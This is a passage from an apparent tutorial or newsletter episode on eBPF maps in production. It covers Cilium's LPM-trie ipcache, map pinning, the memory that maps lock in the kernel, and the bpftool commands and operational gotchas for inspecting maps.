You can store a mix of specific host addresses (/32) and CIDR ranges (/16, /24) in the same map, and a lookup returns the most specific match. If 10.0.1.15/32 and 10.0.0.0/8 are both in the map, a lookup for 10.0.1.15 returns the /32 entry.

Cilium’s cilium_ipcache map is an LPM trie. It maps every IP in the cluster to its security identity — the identifier Cilium uses for policy enforcement. When a packet arrives, Cilium does a trie lookup on the source IP to find out which endpoint sent it, then checks policy against that identity.

# Inspect the ipcache map
bpftool map show id 13
# lpm_trie  name cilium_ipcache  key 40B  value 32B  max_entries 512000

# Look up which security identity owns a pod IP
# (key layout assumed here: 4-byte prefix length, 0x20 = /32, then the
#  IP address, zero-padded to the map's 40-byte key size)
bpftool map lookup id 13 key hex 20 00 00 00 0a 00 01 0f 00 00 00 00 00 00 00 00 00 00 00 00 \
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Where you see them: IP-to-identity mapping (Cilium), CIDR-based policy enforcement, IP blocklists.
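The longest-prefix-match semantics can be reproduced with the stdlib ipaddress module. The sketch below stores a /32 and a /8 in the same "map" and shows the most specific covering prefix winning (assumption: a real LPM trie does this in one trie walk, not a linear scan; identity values are illustrative):

```python
# Longest-prefix match in miniature.
import ipaddress

lpm = {
    ipaddress.ip_network("10.0.1.15/32"): "identity-42",
    ipaddress.ip_network("10.0.0.0/8"):   "identity-7",
}

def lpm_lookup(ip):
    # Return the value of the most specific prefix covering this address.
    addr = ipaddress.ip_address(ip)
    matches = [net for net in lpm if addr in net]
    return lpm[max(matches, key=lambda n: n.prefixlen)] if matches else None

assert lpm_lookup("10.0.1.15") == "identity-42"   # the /32 beats the /8
assert lpm_lookup("10.9.9.9") == "identity-7"     # only the /8 covers this
assert lpm_lookup("192.168.1.1") is None          # no prefix matches
```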


Pinned Maps — State That Survives Restarts

By default, a map’s lifetime is tied to the tool that created it. When the tool exits, the kernel garbage-collects the map.

Pinning writes a reference to the BPF filesystem at /sys/fs/bpf, which keeps the map alive even after the creating process exits:

# See all maps Cilium has pinned
ls /sys/fs/bpf/tc/globals/
# cilium_ct4_global  cilium_ipcache  cilium_metrics  cilium_policy ...

# Inspect a pinned map directly — no Cilium process needed
bpftool map dump pinned /sys/fs/bpf/tc/globals/cilium_ct4_global

# Pin any map by ID for manual inspection
bpftool map pin id 12 /sys/fs/bpf/my_conn_tracker
bpftool map dump pinned /sys/fs/bpf/my_conn_tracker

Cilium pins all its maps under /sys/fs/bpf/tc/globals/. When Cilium restarts — rolling upgrade, crash, OOM kill — it reopens its pinned maps and resumes with existing state intact. Pods maintain established TCP connections through a Cilium restart without disruption.

This is operationally significant: if you’re evaluating eBPF-based tools for production, check whether they pin their maps. A tool that doesn’t loses all its tracked state on every restart — connection tracking resets, process lineage gaps, policy state rebuilt from scratch.


Map Memory: A Production Consideration

Map memory is kernel-locked — it cannot be paged out, and it doesn’t show up in standard memory pressure metrics. Your node’s free output and container memory limits don’t account for it.

Kernel-locked memory is memory the OS guarantees will never be swapped to disk — it stays in RAM permanently. The kernel requires this for eBPF maps because a kernel program running during a network interrupt cannot wait for a page fault. The side effect: it doesn’t appear in top, free, or container memory metrics, so it’s easy to accidentally provision nodes without accounting for it.

# Total eBPF map memory locked on this node
bpftool -j map list | python3 -c "
import json,sys
maps=json.load(sys.stdin)
total=sum(m.get('bytes_memlock',0) for m in maps)
print(f'Total map memory: {total/1024/1024:.1f} MB')
"

# Check system memlock limit (unlimited is correct for eBPF tools)
ulimit -l

# Check what Cilium's systemd unit sets
systemctl show cilium | grep -i memlock

On a node running Cilium + Falco + Datadog NPM, I’ve seen 200–400MB of map memory locked. That’s real, non-pageable kernel memory. If you’re sizing nodes for eBPF-heavy workloads, account for this separately from your pod workload memory.

If an eBPF tool fails to load with a permission error despite having enough free memory, the root cause is usually the memlock ulimit for the process. Cilium, Falco, and most production tools set LimitMEMLOCK=infinity in their systemd units. Verify this if you’re deploying a new eBPF-based tool and seeing unexpected load failures.


Inspecting Maps in Production

# List all maps: type, name, key/value sizes, memory usage
bpftool map list

# Dump all entries in a map (careful with large maps)
bpftool map dump id 12

# Look up a specific entry by key
bpftool map lookup id 12 key hex 0a 00 01 0f 00 00 00 00

# Watch map stats live
watch -n1 'bpftool map show id 12'

# See all maps for a specific tool by checking its pinned path
ls /sys/fs/bpf/tc/globals/                    # Cilium
ls /sys/fs/bpf/falco/                         # Falco (if pinned)

# Cross-reference map IDs with the programs using them
bpftool prog list
bpftool map list

⚠ Production Gotchas

A full LRU map drops state silently, not loudly
When Cilium’s CT map fills up, it starts evicting the least recently used connections — not returning an error. You see connection resets, not a tool alert. Check map utilisation (bpftool map dump id X | grep -c key) against max_entries on nodes with high connection rates.

Ring buffer drops don’t stop the tool — they create gaps
When Falco’s ring buffer fills up, events are dropped. Falco keeps running. The rule engine keeps processing. But you have gaps in your syscall visibility. Monitor Dropped events in Falco’s stats and size the ring buffer accordingly.

Map memory is invisible to standard monitoring
200–400MB of kernel-locked memory on a Cilium + Falco node doesn’t appear in top, container memory metrics, or memory pressure alerts. Size eBPF-heavy nodes with this in mind and add explicit map memory monitoring via bpftool.

Tools that don’t pin their maps lose state on restart
A Cilium restart with pinned maps = zero-disruption connection tracking. A tool without pinning = all tracked state rebuilt from scratch. This matters for connection tracking tools and any tool maintaining process lineage.

perf_event_array on kernel 5.8+ is the old way
Older eBPF tools use per-CPU perf_event_array for event streaming. Ring buffer is strictly better — single allocation, lower overhead, simpler consumption. If you’re running a tool that still uses perf_event_array on a 5.8+ kernel, it’s using a legacy path.


Key Takeaways

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

What’s Next

You know what program types run in the kernel, and you know how they hold state. But there’s a problem anyone running eBPF-based tools eventually runs into: a tool works on one kernel version and breaks on the next. Struct layouts shift between patch versions. Field offsets move. EP06 covers CO-RE (Compile Once, Run Everywhere) and libbpf — the mechanism that makes tools like Cilium and Falco survive your node upgrades without recompilation, and why kernel version compatibility is a solved problem for any tool built on this toolchain.

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe